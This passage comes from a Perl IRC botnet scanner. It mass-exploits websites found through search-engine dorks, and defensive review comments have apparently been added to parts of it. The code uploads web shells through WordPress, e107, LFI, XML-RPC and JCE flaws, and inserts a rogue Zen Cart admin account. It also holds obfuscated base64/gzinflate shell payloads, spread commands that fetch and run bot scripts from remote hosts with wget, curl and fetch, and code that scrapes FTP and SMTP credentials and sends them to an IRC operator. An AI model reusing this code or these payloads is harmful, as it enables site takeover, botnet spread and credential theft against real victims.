if ($count == $num-1) { &msg("$chan","$ffmlogo4$engine 9Finished 4for 9$dork "); } my $aplod = LWP::UserAgent->new; my $res = $aplod->post("http://".$site.$bugz,['file' => ['./xxx.php' => 'application/octet-stream'],'name' => 'xxx.php'],'Content-Type' => 'form-data'); my $hasil = $res->content; my $path = "wp-content/uploads/2013/10/xxx.php"; if ($hasil=~ /xxx.php/){ &msg("$chan","$ffmlogo4$engine 9e3x9p3l9o3i9t3i9n3g 4http://$site "); my $test = "http://".$site.$path; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $cekap = &get_content($test); if ($cekap =~ /UnKnown - Simple Shell/) { my $safe = ""; my $os = ""; my $uid = ""; if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$nick","$ffmlogo4$engine 4<9=4>9 Simple sHeLL 4<9=4>9 $test4 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$admin","$ffmlogo4$engine 4<9=4>9 Simple sHeLL 4<9=4>9 $test4 (SafeMode=$safe) (OS=$os) uid=$uid "); } } exit; } } } } }

# zen_exploit($chan, $bug, $nick, $dork, $engine)
#
# Purpose: take the host list that search_engine() returns for $dork/$engine, request
# "http://" . $site . $bug on each host, and hand the host to zen_query() only when the
# fetched page contains the text "zc_install".
#
# Parameters (positional, read from @_):
#   $chan   - IRC channel that receives the progress message
#   $bug    - path suffix appended to every host
#   $nick   - accepted but not used inside this sub
#   $dork   - search query, forwarded to search_engine() and echoed in the progress message
#   $engine - search-engine label, forwarded to search_engine() and zen_query()
#
# No explicit return value. Reads the file-level $zenlogo.
# NOTE(review): "zc_install" presumably identifies an installer page left reachable
# after setup; the code only shows the string match, so confirm against the caller's $bug.
sub zen_exploit() {
    my $chan = $_[0];
    my $bug = $_[1];
    my $nick = $_[2];
    my $dork = $_[3];
    my $engine = $_[4];
    my $count = 0;
    my @totexploit = &search_engine($chan,$bug,$dork,$engine,$zenlogo);
    my $num = scalar(@totexploit);
    if ($num > 0){
        foreach my $site(@totexploit){
            $count++;
            # The "Finished" notice is sent when the counter reaches $num-1,
            # i.e. one iteration before the list is exhausted.
            if ($count == $num-1) { &msg("$chan","$zenlogo4$engine 9Finished 4for 9$dork "); }
            my $test = "http://".$site.$bug;
            # The page is fetched in the parent, before any fork.
            my $html = &get_content($test);
            # Double fork: the parent reaps the first child at once, the first child
            # exits right after forking, and the grandchild does the work detached.
            if (my $pid = fork) { waitpid($pid, 0); }
            else {
                if (fork) { exit; }
                else {
                    if ($html =~ /zc_install/){ &zen_query($chan,$site,$test,$engine); }
                }
                exit;
            }
        }
    }
}

# zen_query($chan, $url, $test, $engine)
#
# Purpose: send one POST to $test whose body is "query_string=" followed by a fixed,
# URL-encoded SQL INSERT. Decoded, the statement adds a row to the `admin` table with
# admin_id 56, admin_name 'adminsys', a fixed e-mail address and a fixed password hash.
# The rest of the sub (continuing on the following line of the file) sets a 3-second
# timeout, sends the request with the file-level $uagent, and classifies the reply:
#   /1 statements processed/i -> announced as "VulN"
#   /Duplicate entry/i        -> announced as "SuccesS"
# In both cases "http://" . $url . "admin/login.php" is sent to $chan and $admin.
#
# Defender note: an unexpected 'adminsys' account (or admin_id 56) in a shop's admin
# table, and request bodies beginning "query_string=INSERT+INTO+admin", are indicators
# that this routine was run against a site; any such account should be treated as
# attacker-created and the credentials of the remaining admin users rotated.
sub zen_query() {
    my $chan = $_[0];
    my $url = $_[1];
    my $test = $_[2];
    my $engine = $_[3];
    # Fixed payload; nothing in it depends on the target.
    my $code = "INSERT+INTO+admin+%28admin_id%2C+admin_name%2C+admin_email%2C+admin_pass%29+VALUES+%2856%2C%27adminsys%27%2C%27admin%40mazacrew.co.cc%27%2C%27617ec22fbb8f201c366e9848c0eb6925%3A87%27%29%3B";
    my $req = HTTP::Request->new(POST => $test);
$req->content_type("application/x-www-form-urlencoded"); $req->content("query_string=".$code); my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(3); my $res = $ua->request($req); my $data = $res->as_string; if ( $data =~ /1 statements processed/i ) { &msg("$chan","$zenlogo4$engine 4<9=4>4 VulN 4<9=4>9 http://".$url."admin/login.php "); &msg("$admin","$zenlogo4$engine 4<9=4>4 VulN 4<9=4>9 http://".$url."admin/login.php "); } elsif ( $data =~ /Duplicate entry/i ) { &msg("$chan","$zenlogo4$engine 4<9=4>9 SuccesS 4<9=4>9 http://".$url."admin/login.php )"); &msg("$admin","$zenlogo4$engine 4<9=4>9 SuccesS 4<9=4>9 http://".$url."admin/login.php "); } } sub e107_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $nick = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$e107logo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$e107logo4$engine 9Finished 4for 9$dork "); } my $test = "http://".$site.$bug; my $shellz = "http://".$site."/images/lobex.php"; my $code = "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"; my $html = &e107_rce_query($test,$code); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if ($html =~ /v0pCr3w
sys:(.+?)
nob0dyCr3w/) { my $sys = $1; my $upload = ""; my $res = &e107_rce_query($test); if ($res =~ /lobexxx/) { my $check = &get_content($shellz); if ($check =~ /UnKnown - Simple Shell/) { &msg("$nick","$e107logo4$engine 4<9=4>9 SheLL 4<9=4>9 $shellz ");sleep(2); } } else { &msg("$chan","$e107logo4$engine 4<9=4>4 System 4<9=4>9 $test 4($sys) ");sleep(2); } } } exit; } } } } sub e107_rce_query() { my $url = $_[0]; my $code = encode_base64('echo "lobexxx";')."JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UXVOVEVQNWNKUDdEc3MzSmpnNGNxRWZwQkRGcWxKZ1N0UkFhSi8wQ3lHWHNXcktIdmJacDErUkZ4SC92eks2ZGwrT09SZWtpb1Rnenp6TXZ6ODZPNlg0czUrWHVqbTlYOFU5UlY4ZEZ1KzJUM1IwbWNpRWp5Y3BQZHk1ejdpRWErWlM0ZTF3cHB0MUpGQVp1MkI5YzN6cVQrR2I4NE55MzJ6ODk3ZTYwSHJuaU9pa3FvWWxDRG9IVVRiQUpQQ0p1K0dvd3ZLV1hvOUZhWnprSVZQUWUzVng4M21VUGc3L0dUamlLeHNPK0JWbUtad2tJR3FjeFRNWnZVNERCRWxydUJJWlRQbEtZaXFjc1Axa1pRRDlrd2FNWlIrbWdNY3FMbERtcitrckFObXgzS1paSGt1c2xoQS9QTG9Mb2Q5QUxJTURnNG9LZVBJTUttVyt2b0s0QmNVVXpURExwVU1ac29mUnhLZUtjdWF1T0hQc2RuZlZ0VUpDcDdwazk2RTlQa08rUmhzSFZZQlI1a1BLWWRDNjF2Y09oeEJLWW4zTjE5WklpcC91RUdxWG9QcjJNRmMvSVltc3NzU0JtcmN2alFhZlJDa2Q0MnJrVC9Sc1NNdm5Jc0pDNml6dE93TnF2MDRDNXFaV2F5bDhjZTMzS2VMRmVJTjYvTnlyeHFkdU16dS9CNk5aV3NrOHdIQnVjR2toSE1tNmJadUNFNThQK3pTaTY2UDhaWEo5ZEJZNlpoWlFwelltL1UvVUc1K09yNEcwVURRZURrV2J2MGM2aVBPQWl5U3FBNHJQaWJKa3hEOFljcDFFeUs3UE50MEo1d0xaNjRBZU8wUEdiVStqWWpoQ0FrbXhPZFVwbW5iSFRzZmhRRkF0T0RsVjFkeWZobkhKTXQzQzkzWWswZjloYVdwc1dZOWtVLzRmNXY1Q2t5T0RVZnY1Z1BnQThwZDRxdDFTN25jbUszQUp3UjhHaCs5U2xIclFhZ1FIMDBjYm90ajNhZm5pT01SQ2dtWXFudm9tVUwrRVJJcXhGYTVUTTFzN1oxODdOc3Q2VUR3OFJFa1U4MXFneVZOcmVEak90VWFKdXBaRmxBY2tJemt1eVZlMTlXTkJ4SjdKSStWZFlUQmJLVXYrKzAyVE1RQnJYSHZveUpveXJmV09FRHNsbkpRVk9pd2ZnNW9TZk51eHoybmo3dDBYYzNmMmZISUQrZnBJNkVWZm1nSEV5SnptdUUwUDZCdmNyaVkwR1BxV25yd3R0WHVSc0xOSlR3QzRYY3FXSlhwYk1wNXA5MFpTZ3hqNWE4cFJoZThOM2t2TzEzOGFoNURIT0t2UDdBZkFkck96VU9kbXVsTUVCbVJCc2xYWmV3b3ZINEE3U1M4ZGE1Vm83Mk0xL3REQXVzeUpCeVFYUG1IYWpnK2dYM2N4c21qSkVTcXQ1N1Z1QUtmQjROODRtL3FSb3pnODIycXRJWExPRmJoK1R6U0kyN
HFPYWxuMzBlSjFVc0FVK1E1SnhzVVcranJjSXRzamFWQ2R0cGExNmExamVqUldMaXQwNmx0d3MyY293Ulk3YnZsemZnYjJXcWFQaDFPVUE2Y2s0ekVYR0xSemVPbzBremozZ0RNak1ibDQ4c3NoVGRIYUVBUGViRkoyWGthWEI1bDFJNDVrMGFERS9KQlJwZVBkVk14WHdsbkVwN29WMGJ4Y3kyZktIU0pMQXYwQlJnOG43T2h3c3IrTWVvU2ZrMmR5MkZ5TFhVTitvREdyRVZVazc4OVM4dVlEVnJLU0lmZUZYSzJ1ekxKVnp1Yk5FWWJlVWVXWUw0clRFa3NWcFJUQXlXWnp5anc0UDN4Rk1MUERwbmNIYlF5NG1ZcS9wbllhL0diUFQ1TER0ZkR6OUZ3PT0iKSkpOwokZmljaGllciA9IGZvcGVuKCcuL2ltYWdlcy9sb2JleC5waHAnLCd3Jyk7CmZ3cml0ZSgkZmljaGllciwgJGMpOwpmY2xvc2UoJGZpY2hpZXIpOwo="; my $req = HTTP::Request->new(POST => $url); $req->content_type('application/x-www-form-urlencoded'); $req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D"); my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(7); my $res = $ua->request($req); return $res->content; } sub e107_spread_query() { my $url = $_[0]; my $code = "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"; my $req = HTTP::Request->new(POST => $url); $req->content_type('application/x-www-form-urlencoded'); $req->content("send-contactus=1&author_name=%5Bphp%5Deval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D"); my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(7); my $res = $ua->request($req); } sub lfi_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $nick = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$lfilogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$lfilogo4$engine 9Finished 4for 9$dork "); } my $dir = "../../../../../../../../../../../../../../../../../../../../../../../../"; my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000"; my $shell = "http://".$site.$bug.$dir."/tmp/lobex%0000"; my $html = &get_content($test); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if ($html =~ 
/DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT/) { my $res = lfi_env_query($test); # &lfi_spread_query($test); if ($res =~ /c0li#(.*?)#c0li(.*?)SUCCESS/) { my $os = $1; my $uid = $2; my $lficheck = &get_content($shell); if ($lficheck =~ /UnKnown - Simple Shell/){ &msg("$nick","$lfilogo4$engine 4<9=4>9 SheLL 4<9=4>9 $shell 4(OS=$os) $uid "); &msg("$admin","$lfilogo4$engine 4<9=4>9 SheLL 4<9=4>9 $shell 4(OS=$os) $uid "); } else { &msg("$chan","$lfilogo4$engine 4<9=4>9 Vuln 4<9=4>9 $site 4(OS=$os) $uid "); } } } } exit; } } } } sub lfi_env_query() { my $url = $_[0]; my $code = 'JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWxkUXVOVEZIMHVFdjl1bUZPeW93V0hla2gyQldScEtURWxkeUUwUWZvQ3lHWHNWaktMUGJaenhuRkd4SC92dlROcFZaYUYwbmZ6RXVmZVpyL09uTGxCOTNDNUtHcHFGRWFLRnlKRk9wYmFlaC92N2pBcEN4bFdTUlpGWmpGcUQ5SElkTVRkNDFjeDdiYWlNQWpEd2ZEeTJwbkduK003NTdiZC91RnVhcWRvenhYWFZrUUpXbnhsQ0U2dEpadkNJd2FNL2dwVDEvUjhQTDZLem9maG1ONmltNHZQVys1RThPY2tDTWZSY1RTd2dIYVJyZ0JPNHpRbXEwdk1DVkd3VVpNYmdha3huaUpaeFRPV0g2WU1vSis0NE5FY3VtZlFHT1ZTeXB4by8zaGdtenkwRkZncXlmVUswb2NuZEU1bk1ld0hrR0JyYVZPUEg0R0ZXYkZLUTVjQU1xV1pMSm4wb2VLaVEyMjZFbVRPM1BWUmp2Mk9RZnI5RWRCSHo4enVaeUVoeVZoT28rQnZPQTQyZ3ZLWWRDNjFzOE9oeEJJaVA4M1I2aVZTUWZjSk5WblJmVzBlSzU2UlgvRkxiMDRXVFpkVW5VSERGYkRXakdZakJrb2tjZktlYmlQMUZEZUNnR2hEbHdGbTB5czFuVDg3OXZxVW44aHRobXYzenJERWRHRWpuZCtDOGJXVGNZVmdLQnRIalNvcW1iQmFIVGpoNlhWak5ZN09CbjhFbHljWGdYQzBrREtsT2ZHZlEvM2g2ZVFpdUJ4VW8rRmo3Tnh0dExNc0Q3aFZzZ3FnK0t4clhuUE1BNW1qVnlTek5OdHQrOFFtZWRzQnZxT0VqdDRrb1NNcklRQWxpNExRcnVZNmNMMkorRjBVV0U0T1ZYVnRKK0dDY2t5M2NMMDRVZzJmRldQSkZQK2IrVCtScE1qZ3RINzhZRDY5N3JSVXZXaGFqMms3UnJCV0U5d0NjRWZCYnZ2VXBSNk1HSUVCYTlIRzZMWTkybjU0alFrRXdCQVZRbjJUS1YvQkkzRkxsL0FvbVQ4NTUxODdOOXR0UmowOFBDaFY4VGlqeWh4eWV6dk5yQktKaGtoVHlpVVVJNml0Y1puYWU1YWd5U3F4U1BsWFdFd1d5bEwvdnROa2pCQ05lQTk5R1JQRzFUNXJqdzdKWnlVRlRvc0g0T1p4SHpic1UrVzEvVnNsWVdIK1dBMUF2MXlrTG9TVU9VQ1p6RmFPZUFTWXZzSzlWMi9EZ1VKMjcyaFBRb3M4ajFMYUVOamxvcXcwMGF1UytVZXpMNW9TNU5pblZwN1NlbUpMV21iKzVMZHNLTG1QczhyOHZnTjhCenZyT2NmYm5USTRJSk1pc
npMTldHdmhHTnhPR3V1NDZid1pCNmY1bHhFbWNrbkVLVG5qR1ROd1p4RDllWm9GUWtZbTZtR1Y3WDBMTUlQNDJvM2F4SiswcnZuQmMzdTFpMWkyTk5GVWNiT0pqZnpJcG8xKy8xaGRWTEFsUGtPU2NiRkZ2bzYzQW5tVHRZOUI5WnBiTy9BV3ZSdXJGUm03YVhsanMxd3JFNUZsM1BMbDB4M1llSmsrbXBpNkhRaHRNQTZ6akdUN2h0ZEJVSWxtQ3pnRE1qck1pM3NXMmV3c2pSRGdmak5SNTNKeHcyRGpycnZ4V1ptNm1lK1NDcWUxZTZSRUJid2RUSXA3NFpIWVVsbTIvRzZWSlBEWGgzVXdiRituZytWbzFDZjBtRHlhMi9hTTVFMzBEY3RqVkF4eXRUTkN6UnVyWG5pbGNac0srcmxFMEtINXdMSkp1T01qOW9VbExuTXlXODJLcUlPeFovTVZXUDVVUlNkRzVDQ0xuUmNTZit6OUF3PT0iKSkpOwokZmljaGllciA9IGZvcGVuKCcvdG1wL2xvYmV4JywndycpOwpmd3JpdGUoJGZpY2hpZXIsICRjKTsKZmNsb3NlKCRmaWNoaWVyKTsK'; my $ua = LWP::UserAgent->new(agent => ""); $ua->timeout(7); my $req = HTTP::Request->new(GET => $url); my $res = $ua->request($req); return $res->content; } sub xml_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $nick = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$xmllogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$xmllogo4$engine 9Finished 4for 9$dork "); } my $test = "http://".$site.$bug; my $vuln = "http://".$site."12".$bug; my $html = &get_content($test); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if ($html =~ /faultcode/i ) { my $resp = &xml_cek_query2($test); if ($resp =~ /Byroe(.*)Lobex/s) { # &xml_spread_query($test);sleep(1); my $sys = $1; my $shell = "http://".$site."/lobex.php"; my $check = &get_content($shell); if ($check =~ /UnKnown - Simple Shell/) { my $safe = ""; my $os = ""; my $uid = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$nick","$xmllogo4$engine 4<9=4>9 sHeLL 4<9=4>9 $shell4 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$admin","$xmllogo4$engine 4<9=4>9 sHeLL 4<9=4>9 $shell4 (SafeMode=$safe) (OS=$os) uid=$uid "); } # else { # 
&msg("$chan","0,1$xmllogo(4@8$engine4)4(13@12SysTem4)10 ".$vuln." 3".$sys); sleep(1);} } } } exit; } } } } sub xml_cek_query() { my $url = $_[0]; my $code = "system('uname -a');"; my $ua = LWP::UserAgent->new(agent => 'perl post'); $exploit = ""; $exploit .= "test.method"; $exploit .= "',''));"; $exploit .= "echo'j13mb0t';".$code."echo'j13mb0t';exit;/*"; $ua->timeout(7); my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit); return $res->content; } sub xml_cek_query2() { my $url = $_[0]; my $string = "JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UXVOVEVQNWNKUDdEc3MzSmpnNGNxRWZwQkRGcWxKZ1N0UkFhSi8wQ3lHWHNXcktIdmJacDErUkZ4SC92eks2ZGwrT09SZWtpb1Rnenp6TXZ6ODZPNlg0czUrWHVqbTlYOFU5UlY4ZEZ1KzJUM1IwbWNpRWp5Y3BQZHk1ejdpRWErWlM0ZTF3cHB0MUpGQVp1MkI5YzN6cVQrR2I4NE55MzJ6ODk3ZTYwSHJuaU9pa3FvWWxDRG9IVVRiQUpQQ0p1K0dvd3ZLV1hvOUZhWnprSVZQUWUzVng4M21VUGc3L0dUamlLeHNPK0JWbUtad2tJR3FjeFRNWnZVNERCRWxydUJJWlRQbEtZaXFjc1Axa1pRRDlrd2FNWlIrbWdNY3FMbERtcitrckFObXgzS1paSGt1c2xoQS9QTG9Mb2Q5QUxJTURnNG9LZVBJTUttVyt2b0s0QmNVVXpURExwVU1ac29mUnhLZUtjdWF1T0hQc2RuZlZ0VUpDcDdwazk2RTlQa08rUmhzSFZZQlI1a1BLWWRDNjF2Y09oeEJLWW4zTjE5WklpcC91RUdxWG9QcjJNRmMvSVltc3NzU0JtcmN2alFhZlJDa2Q0MnJrVC9Sc1NNdm5Jc0pDNml6dE93TnF2MDRDNXFaV2F5bDhjZTMzS2VMRmVJTjYvTnlyeHFkdU16dS9CNk5aV3NrOHdIQnVjR2toSE1tNmJadUNFNThQK3pTaTY2UDhaWEo5ZEJZNlpoWlFwelltL1UvVUc1K09yNEcwVURRZURrV2J2MGM2aVBPQWl5U3FBNHJQaWJKa3hEOFljcDFFeUs3UE50MEo1d0xaNjRBZU8wUEdiVStqWWpoQ0FrbXhPZFVwbW5iSFRzZmhRRkF0T0RsVjFkeWZobkhKTXQzQzkzWWswZjloYVdwc1dZOWtVLzRmNXY1Q2t5T0RVZnY1Z1BnQThwZDRxdDFTN25jbUszQUp3UjhHaCs5U2xIclFhZ1FIMDBjYm90ajNhZm5pT01SQ2dtWXFudm9tVUwrRVJJcXhGYTVUTTFzN1oxODdOc3Q2VUR3OFJFa1U4MXFneVZOcmVEak90VWFKdXBaRmxBY2tJemt1eVZlMTlXTkJ4SjdKSStWZFlUQmJLVXYrKzAyVE1RQnJYSHZveUpveXJmV09FRHNsbkpRVk9pd2ZnNW9TZk51eHoybmo3dDBYYzNmMmZISUQrZnBJNkVWZm1nSEV5SnptdUUwUDZCdmNyaVkwR1BxV25yd3R0WHVSc0xOSlR3QzRYY3FXSlhwYk1wNXA5MFpTZ3hqNWE4cFJoZThOM2t2TzEzOGFoNURIT0t2UDdBZkFkck96VU9kbXVsTUVCbVJCc2xYWmV3b3ZINEE3U1M4ZGE1Vm83Mk0xL3REQXVzeUpC
eVFYUG1IYWpnK2dYM2N4c21qSkVTcXQ1N1Z1QUtmQjROODRtL3FSb3pnODIycXRJWExPRmJoK1R6U0kyNHFPYWxuMzBlSjFVc0FVK1E1SnhzVVcranJjSXRzamFWQ2R0cGExNmExamVqUldMaXQwNmx0d3MyY293Ulk3YnZsemZnYjJXcWFQaDFPVUE2Y2s0ekVYR0xSemVPbzBremozZ0RNak1ibDQ4c3NoVGRIYUVBUGViRkoyWGthWEI1bDFJNDVrMGFERS9KQlJwZVBkVk14WHdsbkVwN29WMGJ4Y3kyZktIU0pMQXYwQlJnOG43T2h3c3IrTWVvU2ZrMmR5MkZ5TFhVTitvREdyRVZVazc4OVM4dVlEVnJLU0lmZUZYSzJ1ekxKVnp1Yk5FWWJlVWVXWUw0clRFa3NWcFJUQXlXWnp5anc0UDN4Rk1MUERwbmNIYlF5NG1ZcS9wbllhL0diUFQ1TER0ZkR6OUZ3PT0iKSkpOwokZmljaGllciA9IGZvcGVuKCcuL2xvYmV4LnBocCcsJ3cnKTsKZndyaXRlKCRmaWNoaWVyLCAkYyk7CmZjbG9zZSgkZmljaGllcik7Cg=="; my $ua = LWP::UserAgent->new(agent => 'perl post'); $exploit = ""; $exploit .= "test.method"; $exploit .= "',''));"; $exploit .= "echo 'Byroe';echo(php_uname());eval(base64_decode('$string'));echo 'Lobex';exit;/*"; $ua->timeout(7); my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit); return $res->content; } sub xml_spread_query() { my $xmltargt = $_[0]; my $xmlsprd = "system('wget ".$injector." -O lobex.php;fetch ".$injector.";mv bad.txt lobex.php;wget ".$botshell." 
-O tmp.php;fetch ".$botshell.";mv bot.txt tmp.php;killall -9 perl;killall -9 php;cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php bot.txt;rm -rf bot.txt;wget ".$botshell.";php bot.txt;rm -rf bot.txt;curl -O ".$botshell.";php bot.txt;rm -rf bot.txt;lwp-download ".$botshell.";php bot.txt;cd /var/tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php bot.txt;rm -rf bot.txt;wget ".$botshell.";php bot.txt;rm -rf bot.txt;curl -O ".$botshell.";php bot.txt;rm -rf bot.txt;lwp-download ".$botshell.";php bot.txt;');"; my $userAgent = LWP::UserAgent->new(agent => 'perl post'); $exploit = ""; $exploit .= "test.method"; $exploit .= "',''));"; $exploit .= "echo'j13m';".$xmlsprd."echo'b0T';exit;/*"; $userAgent->timeout(7); my $response = $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit); } sub jce_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $nick = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$jcelogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; my $shell = "http://".$site."images/stories/food.php"; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $status = &jce_upload($site);&jce_upload($site); if ($status = 1) { my $check = &get_content($shell."?rf"); if ($check =~ /UnKnown - Simple Shell/) { &get_content($shell."?cmd=curl+-C+-+-O+".$botxx."%3Bperl+alb.txt%3Brm+alb*"); my $safe = ""; my $os = ""; my $uid = ""; my $ftphost = ""; my $ftpuser = ""; my $ftppass = ""; my $ftpopen = ""; my $smtphost = ""; my $smtpuser = ""; my $smtppass = ""; my $smtpauth = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /uid=(.*?)gid=/){$uid=$1;} if ($check =~ m/\$ftp_host = '(.+?)';/i){$ftphost=$1;} if ($check =~ m/\$ftp_user = '(.+?)';/i){$ftpuser=$1;} if ($check =~ m/\$ftp_pass = '(.+?)';/i){$ftppass=$1;} if ($check =~ m/\$ftp_enable = 
'(.+?)';/i){$ftpopen=$1;} if ($check =~ m/\$smtphost = '(.+?)';/i){$smtphost=$1;} if ($check =~ m/\$smtpuser = '(.+?)';/i){$smtpuser=$1;} if ($check =~ m/\$smtppass = '(.+?)';/i){$smtppass=$1;} if ($check =~ m/\$smtpauth = '(.+?)';/i){$smtpauth=$1;} &msg("$chan","$jcelogo9$engine 4<9*4>9 Target Sent To 4<9-4>9 $nick4 (SafeMode=$safe) (OS=$os) uid=$uid "); if ($nick eq $admin) { &msg("$admin","$jcelogo9$engine 4<9*4>9 sHeLL 4<9-4>9 $shell4 (SafeMode=$safe) (OS=$os) uid=$uid "); } else { &msg("$nick","$jcelogo9$engine 4<9*4>9 sHeLL 4<9-4>9 $shell4 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$admin","$jcelogo9$engine 4<9*4>9 sHeLL 4<9-4>9 $shell4 (SafeMode=$safe) (OS=$os) uid=$uid "); } if ($smtpauth =~ /1/) { &msg("$chan","9,1 [8SMTP4] Found on 8http://$site "); &msg("$admin","9,1 [8SMTP4] [ 8host : ".$smtphost." 4] [ 8login : ".$smtpuser." 4] [ 8pass : ".$smtppass." 4]"); } if ($ftpopen =~ /1/){ my $hozt = $site; $hozt =~ s/\///; &ftp($hozt,$ftpuser,$ftppass,$chan); } } } } exit; } if ($count == $num-1) { &msg("$chan","$jcelogo9,1$engine 0Finished 9for 0$dork "); if ($engine =~ /UoL/) { &sendraw("mode $chan -m"); } } } } } sub jce_upload() { my $success = 0; my $url = $_[0]; $url =~ s/http:\/\///; my $host = $url; my $path = $url; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $path =~ s/(.*)\/[^\/]*$/\1/; $path .= "/"; $path =~ s/([-a-zA-Z0-9\.]+)/$2/; if ($path eq "") { $path = "/" } $header1P = "POST ".$path."index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1"; $header1P2 = "POST ".$path."index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1"; $header2 = "Host: $host"; $header3 = "User-Agent: BOT/0.1 (BOT for JCE)"; $header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334"; $header5 = "Content-Length: 5000"; $header6 = "-----------------------------41184676334"; $header7 = 
'Content-Disposition: form-data; name="upload-dir"';
    # Analyst annotation (defensive review of a captured bot; code tokens are
    # left exactly as found). The literal above completes the $header7
    # assignment that starts on the previous line. $header6..$header21 are the
    # boundary lines, part headers and part values of a multipart/form-data
    # body; they are joined with "\n" in the first print below.
    $header8 = '/';
    $header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""';
    $header10 = 'Content-Type: application/octet-stream';
    $header11 = 'Content-Disposition: form-data; name="upload-overwrite"';
    $header12 = "0";
    # The uploaded part is named food.gif, declared as image/gif, and its
    # content begins with the GIF89a signature.
    $header13 = 'Content-Disposition: form-data; name="Filedata"; filename="food.gif"';
    $header14 = 'Content-Type: image/gif';
    $header15 = 'GIF89aGlobex';
    # NOTE(review): this value looks truncated in this copy of the file;
    # presumably markup was stripped when the page was extracted. Confirm
    # against another sample before relying on it.
    $header16 = " ";
    $header17 = 'Content-Disposition: form-data; name="upload-name"';
    $header18 = 'food';
    $header19 = 'Content-Disposition: form-data; name="action"';
    $header20 = 'upload';
    $header21 = "-----------------------------41184676334--";
    # Headers and body of the second request: a JSON call naming the
    # "folderRename" function with arguments "/food.gif" and "food.php".
    $header22 = 'X-Request: JSON';
    $header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8';
    $header25 = 'json={"fn":"folderRename","args":["/food.gif","food.php"]}';
    # Unlike $header5 (a fixed "Content-Length: 5000" set earlier in this sub),
    # this length is computed from the body.
    $header24 = "Content-Length: ".length($header25)."";
    # Request 1: plain TCP to port 80 of $host; the sub returns early when the
    # connection cannot be opened.
    my $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host" ,PeerPort=>"80") || return;
    print $remote "$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n$header8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header12\n$header6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header17\n\n$header18\n$header6\n$header19\n\n$header20\n$header21\n\n";
    # Request 2: a second connection is opened (the name $remote is declared
    # again); nothing is read back from the first one and neither socket is
    # closed in this sub.
    my $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host" ,PeerPort=>"80") || return;
    print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n";
    # The return sits inside the loop body, so only the first line read from
    # the second response is tested against /200 OK/.
    while ($hasil = <$remote>) {
        if ($hasil =~ /200 OK/) { $success = 1; }
        return $success;
    }
}
# Detection notes for web-server log and WAF review, all taken from strings in
# this sub: the User-Agent "BOT/0.1 (BOT for JCE)" ($header3), the fixed
# "Content-Length: 5000" header, POSTs to index.php with
# option=com_jce&task=plugin&plugin=imgmanager, a multipart filename of
